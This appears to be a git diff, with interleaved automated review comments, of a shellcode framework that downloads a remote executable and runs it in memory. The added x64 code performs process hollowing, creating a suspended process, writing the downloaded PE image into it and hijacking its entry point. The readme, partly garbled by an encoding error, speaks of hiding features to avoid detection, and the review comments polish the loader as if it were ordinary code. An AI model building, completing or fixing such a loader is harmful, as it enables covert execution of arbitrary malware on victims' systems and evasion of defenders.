diff --git a/RmExecute/123.bin b/RmExecute/123.bin
new file mode 100644
index 0000000..b64eced
Binary files /dev/null and b/RmExecute/123.bin differ
diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp
index 6820815..5b2b99d 100644
--- a/RmExecute/Loader.cpp
+++ b/RmExecute/Loader.cpp
@@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
int _tmain(int argc, _TCHAR* argv[])
{
+
#endif
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index 07df817..feabde1 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -159,6 +159,11 @@
user32.lib;winhttp.lib;msvcrt.lib;
+
+
+ _DEBUG
+
+
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 6742eb2..d1a5f84 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -1,10 +1,15 @@
#include "ShellCode.h"
//加载起始函数,跳转到入口函数
+#ifdef _WIN64
+VOID mmLoaderSCStart(){
+ Strat();
+#else
VOID _declspec(naked) mmLoaderSCStart()
{
-
+
__asm jmp Strat;
+#endif
}
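Review bot: The two preprocessor branches define the same function in different shapes — the `_WIN64` side puts the opening brace on the signature line (`VOID mmLoaderSCStart(){`) while the x86 side uses a separate `{` line and spells the attribute `_declspec`, whereas the `mmLoaderSCEnd` hunk later in this file uses `__declspec`; the single-underscore form is a legacy alias, so use `__declspec` in both places and the same brace layout. Sharing one closing `}` between two `#ifdef` branches that each open their own brace makes the block hard to match by eye; closing each branch inside its own preprocessor arm reads more safely. The split also deserves a comment on the `#ifdef _WIN64` line explaining why it exists, since the existing header comment only describes the jump-based x86 form: `// x64 MSVC has no inline asm and no __declspec(naked); a plain call is used instead`.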
@@ -49,7 +54,7 @@ public:
//提取项目的main文件,StartSCode相当于项目的main函数
- void __stdcall StartSCode(char * URL)
+ void __stdcall StartSCode()
{
@@ -62,7 +67,7 @@ public:
int size = HttpDownload(host, path, 443, TRUE);
- fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+ //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
RunPortableExecutable();
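Review bot: The commented-out `//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);` at the changed line is dead code left in place. Either delete it or keep the debug call under `#ifdef _DEBUG` / `#endif`, which the `RmExecute.vcxproj` hunk in this commit appears to add as a preprocessor definition (the XML markup is stripped in this view, so that reading is inferred), so the intent survives without a stray comment. StartSCode's body starts and ends outside this hunk.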
@@ -75,15 +80,21 @@ public:
};
//sehllcode入口函数
-void __stdcall Strat(char * URL)
+void __stdcall Strat()
{
//由于需要模拟全局变量,所以使用类包裹下
RmExecute runclass;
- runclass.StartSCode(URL);
+ runclass.StartSCode();
}
-
+#ifdef _WIN64
+void mmLoaderSCEnd()
+{
+
+#else
void __declspec(naked) mmLoaderSCEnd()
{
+
__asm int 3;
+#endif
}
\ No newline at end of file
diff --git a/RmExecute/ShellCode.h b/RmExecute/ShellCode.h
index 88e841e..a0e4121 100644
--- a/RmExecute/ShellCode.h
+++ b/RmExecute/ShellCode.h
@@ -9,7 +9,7 @@
EXTERN_C VOID
mmLoaderSCStart();//这里用来表明shellcode的开始
-void __stdcall Strat(char * URL);//入口函数main
+void __stdcall Strat();//入口函数main
EXTERN_C VOID
mmLoaderSCEnd();//与开头对应的结尾
\ No newline at end of file
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 440a874..f3696ae 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
return dwLast;
}
+#ifdef _WIN64
+bool RmExecute::RunPortableExecutable() {
+ IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
+ IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
+ IMAGE_SECTION_HEADER* SectionHeader;
+ PROCESS_INFORMATION PI;
+ STARTUPINFOA SI;
+
+ CONTEXT* CTX;
+
+ ULONG_PTR* ImageBase; //Base address of the image
+ void* pImageBase; // Pointer to the image base
+
+ int count;
+ char CurrentFilePath[1024];
+
+ DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
+ NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
+
+ GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
+
+ if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
+ {
+ ZeroMemory(&PI, sizeof(PI)); // Null the memory
+ ZeroMemory(&SI, sizeof(SI)); // Null the memory
+
+ if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
+ CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
+ //process in suspended state, for the new image.
+ {
+ // Allocate memory for the context.
+ CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
+ CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
+
+ if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
+ {
+ // Read instructions
+ ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
+
+ pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
+ NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
+
+ // Write the image to the process
+ WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
+
+ for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
+ {
+ SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
+
+ WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
+ LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
+ }
+ WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
+ LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
+
+ // Move address of entry point to the rax register
+ CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
+ SetThreadContext(PI.hThread, LPCONTEXT(CTX));
+ ResumeThread(PI.hThread);
+
+ return 0;
+ }
+ }
+ }
+}
+#else
bool RmExecute::RunPortableExecutable()
{
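Review bot: The new x64 `RunPortableExecutable` returns `0` from a `bool` function on its one explicit return and has no return at all when any of the three `if`s (`Signature == IMAGE_NT_SIGNATURE`, `CreateProcessA`, `GetThreadContext`) fails, so control falls off the end of a non-void function — undefined behaviour and MSVC warning C4715 — while the x86 definition below ends with an explicit `return false;`. `CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));` sizes the allocation by the pointer rather than the structure that `GetThreadContext` fills in; it should be `sizeof(CONTEXT)`, and it only appears to work because `VirtualAlloc` rounds the request up to a page. The `CONTEXT` allocation and the `PROCESS_INFORMATION` handles are never released on any path, so every call leaks them. The x64 function body lies entirely within the hunk; the x86 definition at the hunk's end continues outside it.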
@@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
}
return false;
}
+#endif
\ No newline at end of file
diff --git a/readme.md b/readme.md
index 4d615f6..793bc3a 100644
--- a/readme.md
+++ b/readme.md
@@ -2,7 +2,7 @@
Remote Download and Memory Execute for shellcode framework
-杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屾殏涓嶆敮鎸乆64
+杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屽凡缁忔敮鎸亁64
# 鍙傦紙鎶勶級鑰冿紙琚級椤圭洰
@@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
闅愯棌loadlibrary鐗瑰緛鍜寀rl鐗瑰緛锛屾洿涓嶅鏄撹鍙戠幇
-## X64鏀寔
-
-鑷璋冭瘯`Tool.h->RunPortableExecutable`鍑芥暟锛屽ぇ姒傚氨鏄姞涓猉64瀹忔妸EAX浠涔堟崲鎴怰AX(搴旇
-
## 鍙嶅皠DLL鍔犺浇鎶鏈
瀹屽叏涓嶄娇鐢↙oadLibrary锛孭rocessExplorer銆乸rocexp64绛夊伐鍏锋棤娉曟娴嬪埌杩欎釜dll锛屽悓鏃惰绋嬪簭鍙樺緱妯″潡鍖